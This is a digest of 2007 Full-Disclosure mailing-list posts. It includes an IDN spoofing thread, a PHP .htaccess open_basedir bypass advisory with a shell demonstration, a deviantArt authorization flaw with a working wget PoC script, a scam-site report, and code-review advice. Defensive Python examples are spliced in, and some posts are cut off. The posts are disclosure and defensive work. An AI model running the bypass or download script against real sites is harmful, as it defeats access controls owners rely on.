Re: [Full-disclosure] Apple Safari: idn urlbar spoofing

2007-06-27 Thread Robert Swiecki
Michal Zalewski wrote:

 Whether Safari devs are to blame here exclusively, I'm not sure - IDN
 concept is by itself pretty evil, and this can be viewed simply a clever
 take on homograph attacks.

I found out that Firefox has a configuration property,
network.IDN.blacklist_chars. It includes the character used in the
demonstration (U+3164, HANGUL FILLER) and many more. So the problem
seems to be known (at least in Firefox).

-- 
Robert Swiecki
http://www.swiecki.net
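As an added illustration of the check Robert describes (this is not code from his message and not Firefox's implementation), the following Python does what a blacklist such as network.IDN.blacklist_chars is for: it reports any filler or zero-width code point in a hostname and falls back to the xn-- form for display when one is found. The blacklist is a small constructed subset, not Firefox's actual preference value, and the encoding uses Python's built-in IDNA codec (IDNA 2003 rules).

```python
# Added example (not from Robert's message, and not Firefox's code): a check in
# the spirit of Firefox's network.IDN.blacklist_chars. The blacklist below is a
# constructed subset for illustration, not Firefox's actual preference value.
import unicodedata

# Constructed subset of filler / zero-width code points that render as nothing
# (or as a blank) in a URL bar, which is what makes them usable for spoofing.
IDN_BLACKLIST_CHARS = frozenset({
    "\u3164",  # HANGUL FILLER, the character used in the Safari demonstration
    "\u115f",  # HANGUL CHOSEONG FILLER
    "\u1160",  # HANGUL JUNGSEONG FILLER
    "\u200b",  # ZERO WIDTH SPACE
    "\u200c",  # ZERO WIDTH NON-JOINER
    "\u200d",  # ZERO WIDTH JOINER
    "\u2060",  # WORD JOINER
    "\ufeff",  # ZERO WIDTH NO-BREAK SPACE
})


def find_blacklisted_chars(hostname):
    """Return (position, 'U+XXXX', Unicode name) for every blacklisted
    character in hostname. An empty list means the host passes the check."""
    hits = []
    for pos, ch in enumerate(hostname):
        if ch in IDN_BLACKLIST_CHARS:
            hits.append((pos, "U+%04X" % ord(ch),
                         unicodedata.name(ch, "<unnamed>")))
    return hits


def display_form(hostname):
    """How a URL bar should render the host: the Unicode form only when no
    blacklisted character is present, otherwise the ASCII-compatible
    (xn--, punycode) form, so the hidden character stops being invisible.
    Uses Python's built-in IDNA codec (IDNA 2003 rules)."""
    if find_blacklisted_chars(hostname):
        return hostname.encode("idna").decode("ascii")
    return hostname


if __name__ == "__main__":
    for host in ("example.com", "pay\u3164pal.com"):
        print(repr(host), find_blacklisted_chars(host), "->", display_form(host))
```

The two functions are separate on purpose: the first is the policy decision a browser or a mail gateway can log on, the second is only the rendering consequence.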

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability

2007-06-27 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Source: http://securityreason.com/achievement_securityalert/45

[PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass 
Vulnerability ]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason
Date:
- Written: 10.02.2007
- Public: 27.06.2007

SecurityReason Research
SecurityAlert Id: 45

CVE: CVE-2007-3378
SecurityRisk: High

Affected Software: PHP <= 5.2.3, PHP <= 4.4.7
Advisory URL: http://securityreason.com/achievement_securityalert/45
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed 
from C, Java and Perl with a couple of unique PHP-specific features thrown 
in. The goal of the language is to allow web developers to write dynamically 
generated pages quickly.

 When using PHP as an Apache module, you can also change the configuration 
settings using directives in Apache configuration files (e.g. httpd.conf) 
and .htaccess files. You will need AllowOverride Options or AllowOverride 
All privileges to do so.


 php_value  name  value

Sets the value of the specified directive. Can be used only with 
PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a previously set 
value use none as the value.

Note: Don't use php_value to set boolean values. php_flag (see below) 
should be used instead. 

php_flag name on|off

Used to set a boolean configuration directive. Can be used only with 
PHP_INI_ALL and PHP_INI_PERDIR type directives. 

mail.force_extra_parameters - Force the addition of the specified 
parameters to be passed as extra parameters to the sendmail binary. These 
parameters will always replace the value of the 5th parameter to mail(), even 
in safe mode

http://pl.php.net/manual/en/configuration.changes.php

--- 1. htaccess safemode and open_basedir Bypass Vulnerability ---

When using PHP as an Apache module, you can also change the configuration 
settings using directives in the .htaccess file. These options are used by a lot 
of users to change permission options like display_errors etc. But it is
possible to bypass safe_mode or open_basedir in different functions. For 
example, you can set session.save_path via .htaccess. In the functions 
session_save_path() and ini_set(), save_path is checked for safe_mode and 
open_basedir. In .htaccess it is bypassed: values from .htaccess are not 
checked.

For example:

cxib# ls -la /www/cxib/
total 14
drwxr-xr-x   3 cxib  www   512 Feb 16 20:20 .
drwxr-xr-x  11 www   www  7168 Feb 16 20:07 ..
-rw-r--r--   1 cxib  www    53 Feb 16 20:19 stars.php
drwxr-xr-x   2 cxib  www   512 Feb 16 20:18 temps
cxib# cat /www/cxib/stars.php
<?php
session_save_path("/inne");
session_start();
?>
cxib# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
GET /cxib/stars.php HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Date: Fri, 16 Feb 2007 19:22:58 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1
X-Powered-By: PHP/5.2.1
Content-Length: 732
Content-Type: text/html

<br />
<b>Warning</b>:  session_save_path() [<a
href='function.session-save-path'>function.session-save-path</a>]:
open_basedir restriction in effect. File(/inne) is not within the allowed
path(s): (/www) in <b>/www/cxib/stars.php</b> on line <b>2</b><br />
<br />
<b>Warning</b>:  session_start() [<a
href='function.session-start'>function.session-start</a>]: open_basedir
restriction in effect. File(/var/tmp/) is not within the allowed path(s):
(/www) in <b>/www/cxib/stars.php</b> on line <b>3</b><br />
<br />
<b>Fatal error</b>:  session_start() [<a
href='function.session-start'>function.session-start</a>]: Failed to
initialize storage module: files (path: ) in <b>/www/cxib/stars.php</b> on
line <b>3</b><br />

Connection closed by foreign host.
cxib#

So we can't create the session in that directory. But when we create a
.htaccess file, we can write there:

---
php_value session.save_path /inne
---

cxib# ls -la /www/cxib/
total 16
drwxr-xr-x   3 cxib  www   512 Feb 16 20:26 .
drwxr-xr-x  11 www   www  7168 Feb 16 20:26 ..
-rw-r--r--   1 cxib  www    34 Feb 16 20:26 .htaccess
-rw-r--r--   1 cxib  www    53 Feb 16 20:19 stars.php
drwxr-xr-x   2 cxib  www   512 Feb 16 20:18 temps
cxib# cat /www/cxib/.htaccess
php_value session.save_path /inne
cxib# cat /www/cxib/stars.php
<?php
session_start();
?>

We can't set session.save_path via ini_set() or session_save_path().
Let's try sending a request.

cxib# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
GET /cxib/stars.php HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Date: Fri, 16 Feb 2007 19:30:42 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: PHPSESSID=45cae9284f2f8b7cb05ce96021c9bf4e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
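The defensive counterpart to the advisory above, as an added example (not part of the advisory and not PHP's or Apache's own code): a small audit script that reads .htaccess content and flags php_value/php_flag lines which point a path-valued setting outside open_basedir, which is exactly what the session.save_path line in the advisory does. The sample .htaccess text, the directive sets and the open_basedir value are constructed for the example; the path check uses a directory-boundary rule rather than PHP's plain string-prefix comparison, as noted in the comments.

```python
# Added example, not part of the advisory and not PHP's or Apache's own code:
# audit .htaccess text for php_value/php_flag lines that move a PHP setting
# outside open_basedir, the case the advisory shows with session.save_path.
import os
import re

# Path-valued settings a site owner can redirect from .htaccess (assumption:
# session.save_path is the one the advisory demonstrates, the others are the
# same class of directive).
PATH_DIRECTIVES = {"session.save_path", "upload_tmp_dir", "error_log",
                   "auto_prepend_file", "auto_append_file"}
# Settings to flag whenever they appear in .htaccess at all, whatever the
# running PHP version lets the directive do.
SENSITIVE_DIRECTIVES = {"mail.force_extra_parameters", "open_basedir"}

DIRECTIVE_RE = re.compile(
    r"^\s*(php_value|php_flag|php_admin_value|php_admin_flag)\s+(\S+)\s+(.*?)\s*$",
    re.IGNORECASE)


def parse_php_directives(htaccess_text):
    """Return (directive, ini_name, value) for every php_* line, skipping comments."""
    found = []
    for line in htaccess_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = DIRECTIVE_RE.match(line)
        if m:
            found.append((m.group(1).lower(), m.group(2).lower(),
                          m.group(3).strip("\"'")))
    return found


def inside_basedir(path, allowed_dirs):
    """True if path lies inside one of allowed_dirs. This is a directory
    boundary check; PHP's own open_basedir compares string prefixes, so a
    bare '/www' would also admit '/www2' unless written as '/www/'."""
    p = os.path.normpath(path)
    for base in allowed_dirs:
        b = os.path.normpath(base)
        if p == b or p.startswith(b.rstrip("/") + "/"):
            return True
    return False


def find_violations(htaccess_text, open_basedir):
    """Return (ini_name, value, reason) for each directive that escapes the
    open_basedir list (colon-separated, as in php.ini) or touches a sensitive
    setting."""
    allowed = [d for d in open_basedir.split(":") if d]
    findings = []
    for _directive, name, value in parse_php_directives(htaccess_text):
        if name in PATH_DIRECTIVES and not inside_basedir(value, allowed):
            findings.append((name, value, "path outside open_basedir " + open_basedir))
        elif name in SENSITIVE_DIRECTIVES:
            findings.append((name, value, "security setting overridden from .htaccess"))
    return findings


# Constructed sample, modelled on the advisory's .htaccess.
SAMPLE_HTACCESS = """\
# constructed sample
php_value session.save_path /inne
php_value upload_tmp_dir /www/cxib/temps
php_flag display_errors on
php_value mail.force_extra_parameters "-fnobody@example.invalid"
"""

if __name__ == "__main__":
    for name, value, reason in find_violations(SAMPLE_HTACCESS, "/www"):
        print("%s = %s: %s" % (name, value, reason))
```

Running it over the sample flags session.save_path (/inne is outside /www) and mail.force_extra_parameters, while upload_tmp_dir under /www/cxib/temps and display_errors pass. The audit is only a detective control: on a shared host the preventive fix is AllowOverride None (or at least not Options/All) for untrusted document roots, and setting the sensitive directives with php_admin_value/php_admin_flag in httpd.conf, which .htaccess cannot override.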

[Full-disclosure] IOS Exploitation Techniques Paper

2007-06-27 Thread Andy Davis
It has been more than a year since Michael Lynn first demonstrated a
reliable code execution exploit on Cisco IOS at Black Hat 2005. Although
his presentation received a lot of media coverage in the security
community, very little is known about the attack and the technical
details surrounding the IOS check_heaps() vulnerability. This paper is a
result of research carried out by IRM to analyse and understand the
check_heaps() attack and its impact on similar embedded devices.
Furthermore, it also helps developers understand security-specific
issues in embedded environments and develop mitigation strategies for
similar vulnerabilities. The paper primarily focuses on the techniques
developed for bypassing the check_heaps() process, which has
traditionally prevented reliable exploitation of memory-based overflows
on the IOS platform. Using inbuilt IOS commands, memory dumps and open
source tools IRM was able to recreate the vulnerability in a lab
environment. The paper is divided into three sections, which cover the
ICMPv6 source-link attack vector, IOS Operating System internals, and
finally the analysis of the attack itself.

The full paper can be downloaded from:

http://www.irmplc.com/index.php/69-Whitepapers

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] deviantArt does not check authorization for image download

2007-06-27 Thread Timothy Redaelli
Security Advisory
-
Title:        deviantArt does not check authorization for image download
Risk Rating:  High
Platforms:    Any
Author:       Timothy Redaelli [EMAIL PROTECTED]
Date:         27-06-2007

Overview

deviantArt does not apply any type of authorization checking for full-size 
image download.

Details
---
It is possible to download the full-size (as uploaded) image even if the 
Download button is disabled.

Proof of Concept

#!/bin/sh
# Copyright (c) 2007 Timothy Redaelli [EMAIL PROTECTED]

URL=$1

download()
{
wget -U "" -nv "$@"
}

parse()
{
wget -U "" http://www.deviantart.com/download/$URL/ && exit 0
URLS=$(wget -qU "" -O - http://www.deviantart.com/deviation/$URL/ |
fgrep 'deviantART.pageData' | sed -e 's/^.*fullview: {[^}]*\(http[^"]*\).*$/\1/' -e 's/\\//g' |
awk -F / '{for (i = 0; i <= 0xF; i++) for (j = 0; j <= 0xF; j++)
printf "http://69.28.181.52/%s/f/%s/%s/%x/%x/%s\n", $4, $6, $7, i, j, $10}')
}

parse $1

echo "$URLS" | while read x; do
download $x && exit 0
done

Timeline

Mar 26, 2007 -- Bug discovery.
Mar 27, 2007 -- Contact deviantArt, no reply.
Jun 26, 2007 -- Recontact deviantArt, still no reply.
Jun 27, 2007 -- Bug published.

Credits
---
* Timothy Redaelli [EMAIL PROTECTED]

-- 
Timothy Redaelli
http://timothyredaelli.wordpress.com/
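The fix for the class of problem Timothy describes is to make the server decide, per request, whether the caller may have the original file, instead of relying on the Download button being hidden. The following is an added example in Python (not from the advisory and not deviantArt's code) of such a handler: an authorisation rule evaluated server-side, short-lived HMAC-signed links for the download path, and a verifier that re-runs the rule so a permission withdrawn after the link was issued still wins. The secret key, the record store and every name are constructed for the example.

```python
# Added example, not from the advisory and not deviantArt's code: a download
# handler that decides authorisation on the server and issues short-lived,
# signed links, so that hiding the Download button is never the only control.
# The secret key, the record store and all names here are constructed.
import hashlib
import hmac
import time
from urllib.parse import parse_qs, urlparse

SECRET_KEY = b"constructed-example-key-load-from-config"  # assumption: real key comes from config
LINK_TTL_SECONDS = 300

# Constructed sample store: deviation id -> owner and whether downloads are on.
DEVIATIONS = {
    "12345": {"owner": "alice", "downloads_enabled": False},
    "67890": {"owner": "bob", "downloads_enabled": True},
}


def can_download(user, deviation_id):
    """The authorisation rule, evaluated on the server for every request:
    the owner may always fetch the original, anyone else only when the
    artist enabled downloads. Unknown ids are denied."""
    record = DEVIATIONS.get(deviation_id)
    if record is None:
        return False
    return user == record["owner"] or record["downloads_enabled"]


def _signature(deviation_id, user, expires):
    msg = "%s|%s|%d" % (deviation_id, user, expires)
    return hmac.new(SECRET_KEY, msg.encode("utf-8"), hashlib.sha256).hexdigest()


def make_download_link(user, deviation_id, now=None):
    """Return a signed download path, or None when the user is not allowed.
    The MAC covers the id, the user and the expiry, so the link is not
    transferable to another file, another user or a later time."""
    if not can_download(user, deviation_id):
        return None
    current = int(time.time() if now is None else now)
    expires = current + LINK_TTL_SECONDS
    return "/download/%s?u=%s&exp=%d&sig=%s" % (
        deviation_id, user, expires, _signature(deviation_id, user, expires))


def verify_download_link(path, now=None):
    """Check signature and expiry, then re-run the authorisation rule so a
    permission the artist withdrew after the link was issued still wins.
    Returns (True, deviation_id) or (False, reason)."""
    parts = urlparse(path)
    prefix = "/download/"
    if not parts.path.startswith(prefix):
        return (False, "not a download path")
    deviation_id = parts.path[len(prefix):]
    query = parse_qs(parts.query)
    try:
        user = query["u"][0]
        expires = int(query["exp"][0])
        sig = query["sig"][0]
    except (KeyError, ValueError):
        return (False, "malformed link")
    if not hmac.compare_digest(sig, _signature(deviation_id, user, expires)):
        return (False, "bad signature")
    current = time.time() if now is None else now
    if current > expires:
        return (False, "link expired")
    if not can_download(user, deviation_id):
        return (False, "permission withdrawn")
    return (True, deviation_id)


if __name__ == "__main__":
    link = make_download_link("alice", "12345")
    print(link, verify_download_link(link))
    print(make_download_link("mallory", "12345"))
```

The point of the design is that the storage path never has to be secret: even a visitor who learns the layout of the file store still has to present a link the server signed for them, and the signature is checked before any file is opened.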


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Using Ajax for better and more convincing scams

2007-06-27 Thread Ajay Pal Singh Atwal

Interesting use of Ajax/ Web 2.x by scammers

hxxp://scanner.malwarealarm.com/5/scan.php

Please replace hxxp by http

It detected around 18 infections of Windows Malware on my GNU/ Linux machine 
for the following and more malware listed in this file:
http://scanner.malwarealarm.com/5/fileslist.js
And reported the following
http://scanner.malwarealarm.com/5/images/popup.gif
It was very helpful to offer the following remedies as well
http://scanner.malwarealarm.com/5/images/Activex.gif

It also detected around 15 open ports, hmmm, throughout my career I never came 
across that much BS.

-- 
Sincerely

Ajay Pal Singh Atwal

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Planet Websecurity launched

2007-06-27 Thread christ1an
http://christ1an.blogspot.com/2007/06/planet-websecurityorg-is-launching.html

Those of you who have spoken to me recently may already be aware of this 
project,
but for those who don't, I am pleased to announce the launch of Planet 
Websecurity,
founded with the intention to bring together similarly themed news and rants 
related
to Web security and to display them in one place.

--

Best regards, christ1an
http://christ1an.blogspot.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Static Code Analysis - Nuts and Bolts

2007-06-27 Thread Debasis Mohanty
 What program(s) do you use in static code analysis? It doesn't matter if
 you are a hardcore grep+editor researcher or if you use complex
 frameworks: Tell me (and also the rest of the list) about it.

Secure code review is one of the most misguided fields, where many
security folks talk only about grep'ing for threat patterns.
Of course I do not rule it out as a starting point, but there is a lot
more to it.

I have my own approach to secure code review. A simple and easy-to-follow
approach is:

a) Build up a Taxonomy of security coding errors specific to various platforms

The taxonomy of coding errors defined by Gary McGraw (cigital.com) in
his famous book Software Security - Building Security In is a good
starting point to baseline with.

There are several such taxonomies of coding errors floating around, but
most of them seem to be flawed in one way or another. I found
McGraw's classification of errors (i.e. security flaws) to be useful,
and it can be made a part of both manual and automatic code review.

A nice write up on various such taxonomies can be found here -
http://securesoftware.blogspot.com/2005/12/threat-vulnerabilities-classification.html

Moving further, you can refer to CWE
(http://cwe.mitre.org/data/dictionary.html), which presently seems to
be a superset of all common software weaknesses.


b) Create a set of secure coding anti-patterns specific to various platforms

Secure coding anti-patterns are commonly used poor solutions to common
security problems. This comes in handy in getting more accurate results
when you run the anti-pattern cheat sheet through the code.

For Example:
*  Use of an unbounded copy
char buf[1024];
strcpy(buf, s);

* Use of a bounded copy with incorrect calculations
char buf[1024];
strncpy(buf, s, 1025);

Both of the above code snippets are vulnerable. One more example:
a check for a NULL value will not always take care of a NP (Null
Pointer) dereference bug, i.e. there are many weak ways of preventing
NP errors which don't provide *hard to break* protection.

check out
https://www.blackhat.com/presentations/win-usa-03/bh-win-03-schoenfeld.pdf
http://developers.sun.com/learning/javaoneonline/j1sessn.jsp?sessn=TS-2594yr=2007track=5

Google for "secure coding antipatterns" to find more references.



c) Grep for anti-patterns or secure coding mistakes

Use your favorite editor here and grep for all security anti-patterns.
I am a great fan of SciTE, which supports almost all languages. Get it
here: http://scintilla.sourceforge.net/

Though this is an important phase during code review, it is definitely
not the ultimate phase for finding security holes. The important phase is
what comes next, i.e. manual Data Flow (DF) and Control Flow (CF)
analysis.


d) Manual Data Flow (DF) and Control Flow (CF) analysis

DF analysis - http://en.wikipedia.org/wiki/Data_flow_analysis

CF analysis - http://en.wikipedia.org/wiki/Control_flow_graph

Performing both DF and CF analysis manually takes a lot of time but is
definitely the most important part of code review. It helps identify
accurate threats from a security standpoint. This phase requires a
master code security ninja's hand to ensure actual issues are
captured.

For example: not every request.getParameter() you see in Java
can be flagged as a potential XSS vector. In other words it is
necessary to check
- whether the data can be directly or indirectly tampered with by a
malicious user at any given point of time to cause a successful XSS
attack

- whether the data is sanitised for malicious inputs before it
is directly written to the user page.

- whether the data is encoded before being written back to the user page

Similarly there are lots of such factors based on which a code reviewer
will be able to decide whether the finding is actually a threat or
not.


A few code review optimization tricks:
- Know languages like Python or Ruby so that you can write some
scripts to automate steps c and d.

- Every time you find unique anti-patterns, do update your anti-pattern
cheat sheet.

- For ease, decompose a big application into various modules for
code review.

- Prioritize the security anti-patterns based on your own skills to
identify them faster and more accurately. For example, I am fast at finding
XSS anti-patterns compared to NP exceptions. So I'll push NP
anti-patterns towards the end.

- If at any point of time a particular issue is taking more time to
investigate, then tag it for future review and move on to the next.


That's all I have for now; hope it helps.

-d

On 6/22/07, Paul Sebastian Ziegler [EMAIL PROTECTED] wrote:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA512

 Hi list,

 due to personal interest I'd like to ask on your opinion regarding best
 practices for static code analysis.
 I guess most of us are accustomed to this method. After all - if you
 want to find a vulnerability that basically means that either luck,
 fuzzing or statical analysis will have something to do in the 
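Debasis's step (c) and his two C anti-patterns (unbounded strcpy, and strncpy with a length larger than the destination) lend themselves to exactly the kind of script his optimization tricks recommend. The following is an added Python example, not code from his post, that greps C source for those two patterns and, because it remembers the declared sizes, can tell a miscalculated bound from a correct one. It is a single-line, literal-size triage tool only, which is the point he makes: it gives you a list to start the DF/CF analysis from, not a verdict. The sample C source is constructed.

```python
# Added example (not from Debasis's post): a triage grep for the two C
# anti-patterns he lists, with declared buffer sizes tracked so strncpy
# bounds can be compared against the destination. Sample source is constructed.
import re

# char name[N];  -> remember N for name
DECL_RE = re.compile(r"\bchar\s+(\w+)\s*\[\s*(\d+)\s*\]")
# strcpy(dst, ...)  -> always an unbounded copy
STRCPY_RE = re.compile(r"\bstrcpy\s*\(\s*(\w+)\s*,")
# strncpy(dst, src, N) with a literal N -> compare N with the declared size
STRNCPY_RE = re.compile(r"\bstrncpy\s*\(\s*(\w+)\s*,[^,]+,\s*(\d+)\s*\)")


def scan_c_source(src):
    """Return (line_no, kind, source_line) findings for one translation unit.
    kinds: unbounded-copy, bounded-copy-overflow (N > size),
    bounded-copy-no-nul (N == size, so the result may be unterminated)."""
    sizes = {}
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for name, size in DECL_RE.findall(line):
            sizes[name] = int(size)
        if STRCPY_RE.search(line):
            findings.append((lineno, "unbounded-copy", line.strip()))
        m = STRNCPY_RE.search(line)
        if m:
            dst, n = m.group(1), int(m.group(2))
            if dst in sizes and n > sizes[dst]:
                findings.append((lineno, "bounded-copy-overflow", line.strip()))
            elif dst in sizes and n == sizes[dst]:
                findings.append((lineno, "bounded-copy-no-nul", line.strip()))
    return findings


# Constructed sample: the post's two snippets plus one borderline and one clean case.
SAMPLE_C = """\
char buf[1024];
strcpy(buf, s);
char buf2[1024];
strncpy(buf2, s, 1025);
char buf3[64];
strncpy(buf3, s, 64);
char ok[64];
strncpy(ok, s, sizeof(ok) - 1);
"""

if __name__ == "__main__":
    for lineno, kind, text in scan_c_source(SAMPLE_C):
        print("line %d: %s: %s" % (lineno, kind, text))
```

The last sample line is deliberately not matched: a bound written as sizeof(ok) - 1 is not a literal, and deciding whether it is right is precisely the data-flow question the grep cannot answer, so it is left for step (d).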

Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN

2007-06-27 Thread Jared DeMott
Month of Random Hashes wrote:
 [ITEM #1]  == my hinney
 sha1: a25d7360e1294a6a6242ed4621d5d73347ea6398
Took a picture of my backend and would like to post the hash.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN

2007-06-27 Thread Joey Mengele
lolololol

On Wed, 27 Jun 2007 13:48:45 -0400 Jared DeMott [EMAIL PROTECTED] 
wrote:
Month of Random Hashes wrote:
 [ITEM #1]  == my hinney
 sha1: a25d7360e1294a6a6242ed4621d5d73347ea6398
Took a picture of my backend and would like to post the hash.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] IOS Exploitation Techniques Paper

2007-06-27 Thread Mike Caudill
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 Andy Davis [EMAIL PROTECTED] [2007-06-27 06:07] wrote:
 It has been more than a year since Michael Lynn first demonstrated a reliable
 code execution exploit on Cisco IOS at Black Hat 2005. Although his
 presentation received a lot of media coverage in the security community, very
 little is known about the attack and the technical details surrounding the IOS
 check_heaps() vulnerability. This paper is a result of research carried out by
 IRM to analyse and understand the check_heaps() attack and its impact on
 similar embedded devices. Furthermore, it also helps developers understand
 security-specific issues in embedded environments and developing mitigation
 strategies for similar vulnerabilities. The paper primarily focuses on the
 techniques developed for bypassing the check_heaps() process, which has
 traditionally prevented reliable exploitation of memory-based overflows on the
 IOS platform. Using inbuilt IOS commands, memory dumps and open source tools
 IRM was able to recreate the vulnerability in a lab environment. The paper is
 divided in three sections, which cover the ICMPv6 source-link attack vector,
 IOS Operating System internals, and finally the analysis of the attack itself.
 
 The full paper can be downloaded from:
 
 http://www.irmplc.com/index.php/69-Whitepapers
 

As Andy stated, the IOS Exploitation Techniques whitepaper covers
details regarding IOS vulnerabilities which have been previously
disclosed. The vulnerabilities used in the exploit were resolved across
two separate Cisco security advisories released in 2005.

The first advisory covered the attack vector:

   Cisco Security Advisory:  IPv6 Crafted Packet Vulnerability
   http://www.cisco.com/warp/public/707/cisco-sa-20050729-ipv6.shtml

and the second advisory covered the underlying vulnerability which
allowed for the possibility of remote code execution:

   Cisco Security Advisory:  IOS Heap-based Overflow Vulnerability in System Timers.
   http://www.cisco.com/warp/public/707/cisco-sa-20051102-timers.shtml

Cisco customers should reference those advisories (and more recently
released advisories) to determine the version(s) of software needed to
remediate any vulnerabilities within their network.

We would like to thank Andy for his continued cooperation with us in the
spirit of responsible disclosure and working to increase awareness of
security issues.

For information on working with the Cisco PSIRT regarding potential
security issues, please see our contact information at

http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html

Thanks.

- -Mike-

- -- 

Mike Caudill  [EMAIL PROTECTED] 
PSIRT Incident Manager
DSS PGP: 0xEBBD5271 
+1.919.392.2855 / +1.919.522.4931 (cell) 
http://www.cisco.com/go/psirt

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFGgqcXimPJSeu9UnERAoDCAJ9mKjGzZiG2/JDWMq1ACj6D0uPZ6QCg7Wyb
a2KrlweRQMo8OMOdvTzU5Ks=
=lMUS
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN

2007-06-27 Thread Joey Mengele
LOLOLOLOLOLOL

On Wed, 27 Jun 2007 17:50:55 -0400 Brian Mariani -  Shellcode SRL 
[EMAIL PROTECTED] wrote:
Lolololololololololololo too 

-Message d'origine-
De : [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] De la part de 
Joey
Mengele
Envoyé : mercredi, 27. juin 2007 20:18
À : [EMAIL PROTECTED]; [EMAIL PROTECTED]
Cc : full-disclosure@lists.grok.org.uk
Objet : Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN

lolololol

On Wed, 27 Jun 2007 13:48:45 -0400 Jared DeMott [EMAIL PROTECTED]
wrote:
Month of Random Hashes wrote:
 [ITEM #1]  == my hinney
 sha1: a25d7360e1294a6a6242ed4621d5d73347ea6398
Took a picture of my backend and would like to post the hash.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Static Code Analysis - Nuts and Bolts

2007-06-27 Thread Dave Hull

I agree with Debasis.

I spent a year and a half in an Infosec Office doing code audits for
E-Commerce web apps. I tried various open source automated tools and found
that most of them missed the vast majority of exploitable vulnerabilities.
In my experience, nothing beats a line-by-line analysis of the code by
someone who knows what to look for. Yes, it's time consuming and completely
impractical for sufficiently large applications, but it's more effective
than the tools I tried out.

As for estimating time requirements for line-by-line analysis, I've always
been a fan of under promising and over delivering, and found I could bid
successfully at about a minute per line of code, from there calculate your
hourly rate accordingly.

I wish I could have tried out some commercial tools, but we were too cheap
for that.

When dealing with web apps, walk through the application, note all user
inputs and even those useless hidden fields that so many web app
developers are fond of using, trace through the code and verify that the
developer is validating and sanitizing those inputs correctly. If you want
to be really anal (we are talking security here right?), then you should
also verify that database inputs are also validated and sanitized and
outputs sent back to the user. When you're dealing with E-Commerce apps,
it's hard to be too paranoid.

For web app testing, proxies like Web Scarab from OWASP are invaluable.
Haven't tried Paros but it sounds excellent.

Cheers.

On 6/27/07, Debasis Mohanty [EMAIL PROTECTED] wrote:
8< snip 8<

Though this is an important phase during code review but definitely

not an ultimate phase to find security holes. The important phase is
what comes next i.e. Manual Data Flow (DF) and Control Flow (CF)
analysis.


d) Manual Data Flow (DF) and Control Flow (CF) analysis

DF analysis - http://en.wikipedia.org/wiki/Data_flow_analysis

CF analysis - http://en.wikipedia.org/wiki/Control_flow_graph

Performing both DF and CF analysis manually takes lot of time but is
definitely most important part of code review. It helps identifying
accurate threats from security standpoint. This phase requires a
master code security ninja's hand to ensure actual issues are
captured.



--
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [GOODFELLAS - VULN] hpqxml.dll 2.0.0.133 from HP Digital Imaging Arbitrary Data Write.

2007-06-27 Thread Goodfellas SRT

 :. GOODFELLAS Security Research TEAM  .:
 :. http://goodfellas.shellcode.com.ar .:
 
 hpqxml.dll 2.0.0.133 from HP Digital Imaging Arbitrary Data Write
